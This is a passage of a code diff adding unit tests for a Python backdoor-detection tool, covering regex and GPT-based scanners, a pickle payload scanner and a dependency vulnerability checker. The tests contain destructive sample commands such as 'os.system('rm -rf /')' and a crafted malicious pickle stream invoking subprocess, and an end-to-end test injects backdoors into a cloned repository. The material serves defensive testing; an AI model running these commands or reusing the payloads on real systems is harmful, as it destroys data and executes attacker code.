            (3, "eval('2 + 2')"),
            results["high"],
        )
        self.assertIn(
            (4, "subprocess.run(['echo', 'hello'])"),
            results["medium"],
        )

    def test_gpt_risk_detection(self):
        # Requires a live OpenAI key; skip otherwise.
        if os.getenv("OPENAI_API_KEY") is None:
            warnings.warn("OPENAI_API_KEY is not set, test skipped.", UserWarning)
            self.skipTest("OPENAI_API_KEY is not set")
        content = """import os
os.system('rm -rf /') # high risk
exec('print("Hello")') # high risk
eval('2 + 2') # high risk
"""
        results = detectGPT(content)
        self.assertEqual(len(results["high"]), 3)

    def test_gpt_no_risk_detection(self):
        # Requires a live OpenAI key; skip otherwise.
        if os.getenv("OPENAI_API_KEY") is None:
            warnings.warn("OPENAI_API_KEY is not set, test skipped.", UserWarning)
            self.skipTest("OPENAI_API_KEY is not set")
        content = """a = 10
b = a + 5
print('This should not be detected as risky.')
"""
        results = detectGPT(content)
        self.assertEqual(len(results["high"]), 0)
        self.assertEqual(len(results["medium"]), 0)
        self.assertEqual(len(results["low"]), 0)

    def test_gpt_env_no_set(self):
        # Without an API key, detectGPT must raise ValueError.
        if os.getenv("OPENAI_API_KEY") is not None:
            self.skipTest("OPENAI_API_KEY is setted")
        content = "print('test test')"
        with self.assertRaises(ValueError):
            detectGPT(content)

    def test_find_dangerous_functions_pyc(self):
        # NOTE(review): content here is plain source despite the .pyc
        # extension — presumably the extension only selects the scanning
        # path; confirm against find_dangerous_functions.
        file_content = """import os
os.system('rm -rf /')
"""
        file_extension = ".pyc"

        expected_result = {
            "high": [(2, "os.system('rm -rf /')")],
            "medium": [],
            "low": [],
            "none": [],
        }

        result = find_dangerous_functions(file_content, file_extension)

        self.assertEqual(result, expected_result)
|
||||
|
||||
|
||||
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
||||
168
tests/test_final_tests.py
Normal file
168
tests/test_final_tests.py
Normal file
@@ -0,0 +1,168 @@
|
||||
import time
|
||||
import unittest
|
||||
import shutil
|
||||
import os
|
||||
import threading
|
||||
import re
|
||||
|
||||
from detection.utils import read_file_content
|
||||
from .final_tests_util import (
|
||||
clone_repo,
|
||||
Path,
|
||||
inject_pickle_backdoor,
|
||||
inject_random_backdoor,
|
||||
inject_pyc_backdoor,
|
||||
backdoors,
|
||||
)
|
||||
from detection.Regexdetection import find_dangerous_functions
|
||||
from detection.GPTdetection import detectGPT
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
    """Run GPT-based detection over a list of files concurrently.

    Bug fix: the original constructed each worker with
    ``threading.Thread(target=GPTThread(), ...)`` — invoking ``GPTThread``
    immediately with zero arguments (a TypeError) instead of handing the
    callable to the thread.  The callable itself is now passed.

    Args:
        fileList: Iterable of file paths to scan.

    Returns:
        list: Detection results appended by the worker threads.
    """
    results = []
    threads = []
    for file in fileList:
        content = read_file_content(str(file))
        # Pass the callable; the thread supplies (content, results).
        threads.append(threading.Thread(target=GPTThread, args=(content, results)))
    for thread in threads:
        thread.start()
        # Crude rate limiting so API calls are staggered.
        time.sleep(0.5)
    for thread in threads:
        thread.join()
    return results
|
||||
|
||||
|
||||
def GPTThread(content, results):
    """Worker: run detectGPT on *content* and append to shared *results*.

    Any backend failure (missing key, network error) is printed and
    swallowed so sibling threads keep running.
    """
    try:
        detection = detectGPT(content)
    except Exception as exc:
        print(exc)
    else:
        results.append(detection)
|
||||
|
||||
|
||||
class TestFinalTests(unittest.TestCase):
    """End-to-end evaluation: inject known backdoors into a real repository,
    run the detection CLI over it, and measure how many injections are
    reported in the generated output file."""

    def setUp(self) -> None:
        # Work on a throwaway copy so injections never touch the cached clone.
        self.path = "./tmp/repo/"
        shutil.rmtree(self.path, ignore_errors=True)
        if not os.path.exists("/tmp/Python/"):
            clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python")
        shutil.copytree("/tmp/Python", self.path)
        sampleRate = 0.1

        # TODO: preprocessing of the cloned repository before injection.

        # Ground-truth injections: source snippets, pickle and pyc payloads.
        self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate)
        self.pickle_true_num = inject_pickle_backdoor(self.path)
        self.pyc_true_num = inject_pyc_backdoor(self.path)
        self.injectedNum = len(self.inject_result)
        print(self.injectedNum)
        project_path = Path(self.path)

        self.all_python_files = list(project_path.rglob("*.py"))
        self.py_files_num = len(self.all_python_files)

        all_pickle_files = list(project_path.rglob("*.pickle"))
        self.pickle_files_num = len(all_pickle_files)

        all_pyc_files = list(project_path.rglob("*.pyc"))
        self.pyc_files_num = len(all_pyc_files)

        # Run the full CLI once; its report is parsed by the test below.
        os.system(
            "python -m detection " + self.path + " -o " + self.path + "output.txt"
        )

    def test_final_tests_pycode(self):
        # --- regex scan over all python files ---------------------------
        detectedNum = 0
        possibly_dangerous_file = []
        for file in self.all_python_files:
            content = read_file_content(str(file))
            results = find_dangerous_functions(content, ".py")
            if (
                len(results["high"]) > 0
                or len(results["medium"]) > 0
                or len(results["low"]) > 0
            ):
                detectedNum += 1
                possibly_dangerous_file.append(file)
        print(detectedNum / self.py_files_num)
        GPTdetectedNum = 0

        # --- GPT re-check of the files the regex pass flagged -----------
        for i in possibly_dangerous_file:
            content = read_file_content(str(i))
            results = {}
            try:
                results = detectGPT(content)
                if (
                    len(results["high"]) > 0
                    or len(results["medium"]) > 0
                    or len(results["low"]) > 0
                ):
                    GPTdetectedNum += 1
                print(GPTdetectedNum)

            except Exception as e:
                # Best-effort: GPT backend may be unavailable (no API key).
                pass

        # --- compare CLI report against the injected source snippets ----
        with open(self.path + "output.txt", "r") as f:
            lines = f.readlines()
        injected_detected_num = 0
        injected_correct_num = 0
        # Report lines look like "<file>.py: Line <n>: <flagged source>".
        pattern = r"\w+\.py: Line \d+: (.+)"
        for line in lines:
            if "py:" in line:
                injected_detected_num += 1
                match = re.search(pattern, line)
                command = ""
                if match:
                    command = match.group(1)
                # A hit is "correct" if the flagged source belongs to one
                # of the injected snippets.
                for backdoor in backdoors:
                    if command in backdoor:
                        injected_correct_num += 1
                        break

        injected_accurency = injected_detected_num / self.py_files_num
        print(f"injected files accurency: {injected_accurency}")
        try:
            # Concurrent GPT pass; must find at least as much as regex.
            GPTresult = GPTdetectFileList(possibly_dangerous_file)
            for result in GPTresult:
                if len(result) > 0:
                    GPTdetectedNum += 1
            print(GPTdetectedNum)
            self.assertGreaterEqual(GPTdetectedNum, detectedNum)
        except Exception as e:
            # Best-effort: skip the GPT comparison when the backend fails.
            pass

        # --- pickle payload report lines --------------------------------
        with open(self.path + "output.txt", "r") as f:
            lines = f.readlines()
        pickle_detected_num = 0
        pickle_correct_num = 0
        for line in lines:
            if "pickle" in line:
                pickle_detected_num += 1
                if re.search(r"backdoor\d*\.pickle", line):
                    pickle_correct_num += 1

        pickle_accurency = pickle_detected_num / self.pickle_true_num
        print(f"pickle files accurency: {pickle_accurency}")

        # --- pyc payload report lines -----------------------------------
        with open(self.path + "output.txt", "r") as f:
            lines = f.readlines()
        pyc_detected_num = 0
        pyc_correct_num = 0
        for line in lines:
            if "pyc" in line:
                pyc_detected_num += 1
                if re.search(r"backdoor\d*\.pyc", line):
                    pyc_correct_num += 1
        pyc_accurency = pyc_detected_num / self.pyc_true_num
        print(f"pyc files accurency: {pyc_accurency}")
|
||||
|
||||
|
||||
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
||||
56
tests/test_pickle_detection.py
Normal file
56
tests/test_pickle_detection.py
Normal file
@@ -0,0 +1,56 @@
|
||||
import unittest
|
||||
import pickle
|
||||
import tempfile
|
||||
from detection.pickle_detection import pickleScanner, pickleDataDetection
|
||||
from unittest.mock import patch
|
||||
|
||||
|
||||
class TestPickleScanner(unittest.TestCase):
    """Tests for pickle payload scanning and reporting."""

    def setUp(self):
        # Create temporary files with valid and malicious data.
        self.valid_data = {"key": "value"}
        # Raw pickle stream that REDUCEs subprocess.check_output.
        self.malicious_data = b"\x80\x03csubprocess\ncheck_output\nq\x00X\x05\x00\x00\x00echo 1q\x01\x85q\x02Rq\x03."

        self.valid_file = tempfile.NamedTemporaryFile(delete=False)
        self.valid_file.write(pickle.dumps(self.valid_data))
        self.valid_file.close()

        self.malicious_file = tempfile.NamedTemporaryFile(delete=False)
        self.malicious_file.write(self.malicious_data)
        self.malicious_file.close()

    def tearDown(self):
        # Clean up the temporary files created in setUp.
        import os

        os.remove(self.valid_file.name)
        os.remove(self.malicious_file.name)

    def test_valid_pickle(self):
        # A benign pickle reports no REDUCE ops and no suspicious modules.
        with open(self.valid_file.name, "rb") as file:
            scanner = pickleScanner(file)
            print(scanner.maliciousModule)
            scanner.load()
            output = scanner.output()
            self.assertEqual(output["ReduceCount"], 0)
            self.assertEqual(output["maliciousModule"], [])

    def test_malicious_pickle(self):
        # The crafted stream is flagged: one REDUCE invoking subprocess.
        with open(self.malicious_file.name, "rb") as file:
            scanner = pickleScanner(file)
            scanner.load()
            output = scanner.output()
            self.assertEqual(output["ReduceCount"], 1)
            self.assertIn(("subprocess", "check_output"), output["maliciousModule"])

    @patch("builtins.print")
    def test_pickleDataDetection_no_output_file(self, mock_print):
        # Without a filename, results are printed to stdout exactly once.
        with patch("builtins.print") as mock_print:
            pickleDataDetection(self.valid_file.name)
            mock_print.assert_called_once()
|
||||
|
||||
|
||||
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
||||
97
tests/test_requirements_detection.py
Normal file
97
tests/test_requirements_detection.py
Normal file
@@ -0,0 +1,97 @@
|
||||
import unittest
|
||||
from unittest.mock import patch, Mock, MagicMock
|
||||
from detection.requirements_detection import (
|
||||
fetch_html,
|
||||
parse_html,
|
||||
format_results,
|
||||
check_vulnerabilities,
|
||||
)
|
||||
from packaging.version import Version
|
||||
from packaging.specifiers import SpecifierSet
|
||||
|
||||
# Assuming the functions from your provided code are imported here
|
||||
# from your_module import fetch_html, parse_html, format_results, ...
|
||||
|
||||
|
||||
# 测试网页抓取和结果报告的测试类
|
||||
class TestWebScrapingAndReporting(unittest.TestCase):
    """Tests for vulnerability-page scraping and report generation."""

    def test_fetch_html_success(self):
        """fetch_html returns the response body when the request succeeds."""
        with patch("requests.get") as mocked_get:
            mocked_get.return_value.status_code = 200
            mocked_get.return_value.text = "success"
            url = "https://security.snyk.io/vuln/pip/"
            result = fetch_html(url)
            self.assertEqual(result, "success")

    def test_fetch_html_failure(self):
        """fetch_html returns None when the request fails.

        Bug fix: the original assigned ``mocked_get.return_code.status_code``
        (a typo), leaving ``return_value.status_code`` an auto-created
        MagicMock — the non-200 path was exercised only by accident.
        """
        with patch("requests.get") as mocked_get:
            mocked_get.return_value.status_code = 404
            url = "https://security.snyk.io/vuln/pip/"
            result = fetch_html(url)
            self.assertIsNone(result)

    def test_parse_html(self):
        """parse_html extracts (link-text, span-texts) pairs from the table."""
        html_content = """
        <table id="sortable-table">
            <tbody>
                <tr><td></td><td><a href="#">Link1</a><span>Span1</span></td></tr>
                <tr><td></td><td><a href="#">Link2</a><span>Span2</span></td></tr>
            </tbody>
        </table>
        """
        expected = [("Link1", ["Span1"]), ("Link2", ["Span2"])]
        result = parse_html(html_content)
        self.assertEqual(result, expected)

    def test_format_results(self):
        """format_results renders parsed data into the report layout."""
        results = [("Package1", ["1.0", "2.0"]), ("Package2", ["1.5", "2.5"])]
        expected_output = (
            "Package Name: Package1\nVersion Ranges: 1.0, 2.0\n"
            + "--------------------------------------------------\n"
            + "Package Name: Package2\nVersion Ranges: 1.5, 2.5\n"
            + "--------------------------------------------------\n"
        )
        formatted_result = format_results(results)
        self.assertEqual(formatted_result, expected_output)

    def setUp(self):
        """Shared fixture: fake requirements and vulnerability specifiers."""
        self.requirements = {"package1": "1.0", "package2": "2.0"}
        self.vulnerabilities = {
            "package1": SpecifierSet(">=1.0,<2.0"),
            "package3": SpecifierSet(">=1.0,<1.5"),
        }

    @patch("builtins.print")  # capture console output
    def test_check_vulnerabilities_no_output_file(self, mock_print):
        """Without an output file, results are printed to the console."""
        check_vulnerabilities(self.requirements, self.vulnerabilities, None)
        expected_calls = [
            unittest.mock.call(
                "WARNING: package1==1.0 is vulnerable!\nOK: package2 not found in the vulnerability database."
            )
        ]
        mock_print.assert_has_calls(expected_calls, any_order=True)

    @patch("builtins.open", new_callable=unittest.mock.mock_open)
    @patch("os.path.splitext", return_value=("output", ".txt"))
    @patch("os.path.exists", return_value=False)
    @patch("os.makedirs")
    def test_check_vulnerabilities_with_output_file(
        self, mock_makedirs, mock_exists, mock_splitext, mock_open
    ):
        """With an output file, results are written via open()."""
        check_vulnerabilities(self.requirements, self.vulnerabilities, "output.txt")
        mock_open.assert_called_once_with("output.txt", "w", encoding="utf-8")
        handle = mock_open()
        handle.write.assert_called()
|
||||
|
||||
|
||||
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
||||
Reference in New Issue
Block a user